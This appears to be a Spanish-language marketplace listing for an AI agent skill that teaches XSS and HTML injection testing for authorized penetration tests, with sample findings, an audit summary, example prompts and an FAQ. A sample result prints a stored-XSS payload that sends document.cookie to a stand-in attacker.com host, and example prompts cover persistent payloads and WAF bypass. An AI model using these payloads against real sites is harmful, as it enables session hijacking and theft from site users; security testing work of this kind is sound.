Habilidades xss-html-injection

📦

xss-html-injection

Name: xss-html-injection
Author: sickn33

Seguro ⚡ Contiene scripts⚙️ Comandos externos🌐 Acceso a red📁 Acceso al sistema de archivos

Prueba de vulnerabilidades XSS e inyección HTML

Las aplicaciones web frecuentemente contienen fallas de cross-site scripting e inyección HTML que los atacantes explotan para robar sesiones y credenciales. Esta skill proporciona una metodología sistemática para detectar, explotar y validar vulnerabilidades de inyección del lado del cliente en evaluaciones de seguridad autorizadas.

Soporta: Claude Codex Code(CC)

📊 69 Adecuado

Descargar el ZIP de la skill

Subir en Claude

Ve a Configuración → Capacidades → Skills → Subir skill

Activa y empieza a usar

Pruébalo

Usando "xss-html-injection". Test the search parameter for reflected XSS

Resultado esperado:

Vulnerability Found: Reflected XSS in /search?q= parameter
Severity: Medium
Payload: <img src=x onerror=alert(document.domain)>
Context: HTML body - unencoded reflection
Recommendation: Implement output encoding for all user input

Usando "xss-html-injection". Test user profile bio field for stored XSS

Resultado esperado:

Vulnerability Found: Stored XSS in user profile bio
Severity: High (persistent, affects all users)
Payload: <script>fetch('https://attacker.com/log?c='+document.cookie)</script>
Impact: Session hijacking for all users viewing profile
Recommendation: Implement strict input validation and output encoding

Auditoría de seguridad

Seguro

v1 • 2/25/2026

This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.

Archivos escaneados

505

Líneas analizadas

hallazgos

Auditorías totales

Problemas de riesgo bajo (1)

SKILL.md:1-505

Educational Security Testing Content - False Positives

All 121 static findings are FALSE POSITIVES. The skill contains: (1) Examples of vulnerable code patterns (eval, innerHTML, document.write at lines 190,194,195,198,319,328,467) - teaching testers to identify these sinks; (2) Demonstration payloads using example URLs (attacker.com) - standard practice in security documentation; (3) References to keylogger and credential access as attack vectors - essential knowledge for defenders. This is legitimate educational content for authorized penetration testing.

Factores de riesgo

⚡ Contiene scripts (7)

SKILL.md:195 SKILL.md:319 SKILL.md:328 SKILL.md:198 SKILL.md:190 SKILL.md:467 SKILL.md:194

⚙️ Comandos externos (64)

SKILL.md:51-60 SKILL.md:60-65 SKILL.md:65-80 SKILL.md:80-110 SKILL.md:110-117 SKILL.md:117-121 SKILL.md:121-151 SKILL.md:151-158 SKILL.md:158-170 SKILL.md:170-175 SKILL.md:175-181 SKILL.md:181-188 SKILL.md:188-202 SKILL.md:202-207 SKILL.md:207-217 SKILL.md:217-221 SKILL.md:221-234 SKILL.md:234-241 SKILL.md:241-259 SKILL.md:259-264 SKILL.md:264-275 SKILL.md:275-281 SKILL.md:281-297 SKILL.md:297-301 SKILL.md:301-313 SKILL.md:313-317 SKILL.md:317-322 SKILL.md:322-331 SKILL.md:331-333 SKILL.md:333-337 SKILL.md:337-347 SKILL.md:347-352 SKILL.md:352-358 SKILL.md:358-364 SKILL.md:364-365 SKILL.md:365-366 SKILL.md:366-367 SKILL.md:367-368 SKILL.md:368-369 SKILL.md:369-370 SKILL.md:370-373 SKILL.md:373-377 SKILL.md:377-380 SKILL.md:380-392 SKILL.md:392-421 SKILL.md:421-426 SKILL.md:426-431 SKILL.md:431-436 SKILL.md:436-445 SKILL.md:445-447 SKILL.md:447-450 SKILL.md:450-452 SKILL.md:452-455 SKILL.md:455-457 SKILL.md:457-466 SKILL.md:466-468 SKILL.md:468-471 SKILL.md:471-473 SKILL.md:473-482 SKILL.md:482-484 SKILL.md:484-487 SKILL.md:487-489 SKILL.md:489-498 SKILL.md:498

🌐 Acceso a red (27)

📁 Acceso al sistema de archivos (1)

SKILL.md:332

Patrones detectados

Pattern: eval() in Code ExamplesPattern: document.write and innerHTML in ExamplesPattern: Network Requests in Payloads

Auditado por: claude

Puntuación de calidad

Arquitectura

100

Mantenibilidad

Contenido

Comunidad

100

Seguridad

Cumplimiento de la especificación

Lo que puedes crear

Consultor de Seguridad Probando Aplicaciones Web

Realizar pruebas de penetración autorizadas para identificar vulnerabilidades XSS en aplicaciones web de clientes y proporcionar recomendaciones de remediación.

Desarrollador Validando Manejo de Entradas

Probar aplicaciones web personalizadas durante el desarrollo para verificar que se implementa el sanitizado de entrada y codificación de salida adecuados.

Ingeniero QA Realizando Regresión de Seguridad

Incluir pruebas de XSS e inyección HTML en suites de pruebas de regresión de seguridad para detectar vulnerabilidades antes del despliegue a producción.

Prueba estos prompts

Detección Básica de XSS

Use the XSS HTML injection skill to test the login form at https://example.com for reflected XSS vulnerabilities. Identify all input fields and test for basic XSS payloads.

Evaluación de XSS Almacenado

Use the XSS HTML injection skill to test the comment section for stored XSS. Create test payloads that persist and execute when other users view the content.

Descubrimiento de XSS Basado en DOM

Use the XSS HTML injection skill to analyze the JavaScript on https://example.com/dashboard for DOM-based XSS. Check location.hash and location.search handling.

Validación de Evasión de Filtros

Use the XSS HTML injection skill to test if the WAF at https://example.com blocks common XSS payloads. Try HTML encoding, Unicode encoding, and tag variation bypass techniques.

Mejores prácticas

Siempre obtener autorización escrita antes de probar cualquier aplicación objetivo
Usar payloads de demostración controlados que no persisten ni se propagan a usuarios no intencionados
Reportar vulnerabilidades críticas inmediatamente a través de los canales de respuesta a incidentes correspondientes

Evitar

Probar sistemas de producción sin autorización escrita explícita
Usar vulnerabilidades descubiertas para acceso no autorizado o exfiltración de datos
Desplegar payloads que podrían causar denegación de servicio o daño al sistema

Preguntas frecuentes

¿Esta skill realiza ataques reales a sitios web objetivo?

No. Esta skill proporciona metodología y payloads para pruebas de seguridad autorizadas. Los usuarios deben tener permiso escrito explícito antes de probar cualquier sistema.

¿Puede esta skill probar todos los tipos de XSS?

La skill cubre XSS almacenado, reflejar y basado en DOM. Sin embargo, algunas variantes avanzadas como mutation XSS pueden requerir técnicas especializadas adicionales.

¿Qué autorización se requiere antes de usar esta skill?

Se requiere autorización escrita del propietario del sistema. Esto debe incluir el alcance definido, métodos de prueba permitidos y procedimientos de manejo para cualquier dato capturado.

¿Esta skill funciona contra aplicaciones con CSP?

CSP puede bloquear muchos payloads XSS. La skill incluye técnicas para probar evasión de CSP, pero algunas políticas CSP bien configuradas pueden prevenir la explotación exitosa.

¿Siempre se pueden robar cookies de sesión mediante XSS?

No. Las cookies marcadas con HttpOnly no pueden ser accedidas vía JavaScript. Las aplicaciones modernas deben usar esta protección para cookies de sesión.

¿Qué debo hacer si encuentro una vulnerabilidad XSS crítica?

Reportar inmediatamente a través de los canales correspondientes según el acuerdo de autorización. Documentar el hallazgo con prueba de concepto y proporcionar recomendaciones de remediación al propietario.

Detalles del desarrollador

Autor

sickn33

Licencia

MIT

Repositorio

https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/xss-html-injection

Ref.

main

Estructura de archivos

📄 SKILL.md